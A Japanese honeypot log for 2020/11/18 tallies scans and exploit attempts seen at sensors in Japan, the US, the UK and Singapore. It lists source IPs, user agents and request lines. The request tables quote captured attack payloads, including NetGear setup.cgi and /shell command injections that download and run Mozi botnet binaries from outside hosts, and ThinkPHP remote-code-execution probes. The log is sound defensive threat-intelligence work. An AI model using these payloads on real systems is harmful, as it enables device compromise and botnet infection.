ハニーポット(仮) 観測記録 2020/11/18分です。
特徴
Location:JP
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:US
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:UK
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ApiToolによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
WordPress Pluginへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
他
アクセス数推移
JP:総アクセス数:98 (前日比:+69)
US:総アクセス数:41 (前日比:-4)
UK:総アクセス数:44 (前日比:+5)
SG:総アクセス数:43 (前日比:+8)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 2.57.122.186 | Romania |
| 1 | 13.68.156.84 | United States |
| 1 | 14.207.180.52 | Thailand |
| 1 | 66.240.205.34 | United States |
| 1 | 67.207.80.50 | United States |
| 1 | 88.247.151.55 | Turkey |
| 9 | 91.241.19.84 | Russia |
| 1 | 93.44.105.107 | Italy |
| 1 | 103.87.31.193 | India |
| 1 | 104.168.88.123 | United States |
| 10 | 112.126.90.240 | China |
| 1 | 113.116.46.179 | China |
| 1 | 113.178.72.75 | Vietnam |
| 1 | 120.193.91.201 | China |
| 1 | 125.161.131.69 | Indonesia |
| 1 | 178.72.70.97 | Russia |
| 53 | 180.111.252.65 | China |
| 1 | 182.123.244.218 | China |
| 3 | 185.121.69.42 | Germany |
| 1 | 188.166.242.78 | Netherlands |
| 1 | 191.23.244.160 | Brazil |
| 1 | 192.241.239.48 | United States |
| 2 | 193.174.89.19 | Germany |
| 1 | 200.93.85.77 | Venezuela |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 11 | - |
| 4 | Go-http-client/1.1 |
| 2 | Hello, World |
| 53 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 4 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 2 | curl/7.68.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | Gh0st\xad | ||
| 5 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=user&psd=user | HTTP/1.0 |
| 3 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 8 | GET | /currentsetting.htm | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 53 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//182[.]123[.]244[.]218:36875/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /v2/_catalog | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | GET | stager | HTTP/1.1 |
| 1 | GET | stager64 | HTTP/1.1 |
| 2 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 2.57.122.186 | Romania |
| 1 | 18.192.207.184 | United States |
| 2 | 34.123.21.28 | United States |
| 2 | 52.231.159.59 | United States |
| 1 | 61.219.11.153 | Taiwan |
| 18 | 91.241.19.84 | Russia |
| 1 | 103.73.35.38 | India |
| 1 | 113.160.223.195 | Vietnam |
| 3 | 163.172.168.251 | United Kingdom |
| 1 | 183.17.237.193 | China |
| 1 | 192.241.216.32 | United States |
| 1 | 192.241.218.169 | United States |
| 2 | 193.174.89.19 | Germany |
| 1 | 194.61.55.248 | Russia |
| 3 | 212.47.244.68 | France |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 6 | - |
| 1 | Hello, World |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Safari/537.36 OPR/50.0.2762.67 |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 OPR/55.0.2994.61 |
| 18 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 2 | curl/7.68.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 1 | \x03 | ||
| 2 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
| 2 | GET | /.env | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /ReportServer | HTTP/1.1 |
| 3 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 2 | GET | /console/ | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//183[.]17[.]237[.]193:45398/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 3 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 2 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
| 1 | GET | stager | HTTP/1.1 |
| 1 | GET | stager64 | HTTP/1.1 |
| 1 | OPTIONS | / | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | http[:]//allisonhayden[.]xyz/f72881ef9dd53dad8831f644c463586fcac47c1b2694502ea9eae7b0dae7d31ff30b8adc42e68da16f124c04b51b0cd95c378f70a0703a477e0704280047c992513db692b13227f8eb8482e5e19b9af5d71bffda6e78d2fb4646cc760345ff05 | HTTP/1.1 |
| 1 | POST | http[:]//dearth[.]fun/bde81af2ba9fde1c1c50fb38316a9e5f74ecdac9ca614ff5bf9d2b11c08482e19ff2d074576d0d25f8ad25028830e8e1b82611935b9d88e5e611e0ed7670174a9f1240b08f13599f039d7e96ff5edfaa058dc8d867e11be95e16d076b7270991 | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 2.57.122.186 | Romania |
| 1 | 27.78.123.50 | Vietnam |
| 11 | 35.226.26.192 | United States |
| 1 | 36.72.216.251 | Indonesia |
| 1 | 37.126.9.186 | Saudi Arabia |
| 1 | 42.190.164.7 | Malaysia |
| 1 | 49.146.52.15 | Philippines |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 69.162.99.42 | United States |
| 1 | 86.104.194.181 | Romania |
| 9 | 91.241.19.84 | Russia |
| 1 | 95.61.87.81 | Spain |
| 1 | 125.42.97.206 | China |
| 1 | 157.49.193.111 | India |
| 1 | 172.105.89.161 | United States |
| 1 | 192.241.220.234 | United States |
| 1 | 192.241.238.80 | United States |
| 1 | 193.92.109.55 | Greece |
| 2 | 193.174.89.19 | Germany |
| 1 | 195.26.18.167 | Ukraine |
| 1 | 198.199.95.69 | United States |
| 1 | 222.247.95.231 | China |
| 1 | 223.155.38.178 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 23 | - |
| 1 | ApiTool |
| 1 | Hello, World |
| 1 | Hello, world |
| 9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 3 | Mozilla/5.0 zgrab/0.x |
| 2 | curl/7.68.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | GET | //myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //mysql/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpmy/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/db___.init.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin3/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //scripts/setup.php | HTTP/1.1 |
| 1 | GET | //sql/sql/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //sqladmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /ReportServer | HTTP/1.1 |
| 3 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 8 | GET | /currentsetting.htm | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /muieblackcat | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | GET | stager | HTTP/1.1 |
| 1 | GET | stager64 | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 2.57.122.186 | Romania |
| 1 | 27.35.236.87 | South Korea |
| 1 | 52.188.156.192 | United States |
| 1 | 61.219.11.153 | Taiwan |
| 4 | 66.240.219.146 | United States |
| 1 | 80.0.13.47 | United Kingdom |
| 9 | 91.241.19.84 | Russia |
| 1 | 94.17.11.163 | Malta |
| 1 | 103.210.106.212 | India |
| 1 | 113.161.18.46 | Vietnam |
| 1 | 113.164.80.128 | Vietnam |
| 1 | 115.58.81.37 | China |
| 1 | 123.19.253.142 | Vietnam |
| 10 | 154.113.16.226 | Nigeria |
| 1 | 158.140.187.240 | Indonesia |
| 1 | 185.202.1.187 | Russia |
| 1 | 188.191.102.190 | Ukraine |
| 1 | 192.241.237.136 | United States |
| 1 | 192.241.239.189 | United States |
| 2 | 193.174.89.19 | Germany |
| 1 | 202.164.138.156 | India |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 15 | - |
| 1 | Go-http-client/1.1 |
| 1 | Hello, World |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
| 9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 2 | curl/7.68.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | - | ||
| 1 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /ReportServer | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
| 2 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 8 | GET | /currentsetting.htm | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
| 1 | GET | stager | HTTP/1.1 |
| 1 | GET | stager64 | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /HNAP1/ | HTTP/1.0 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
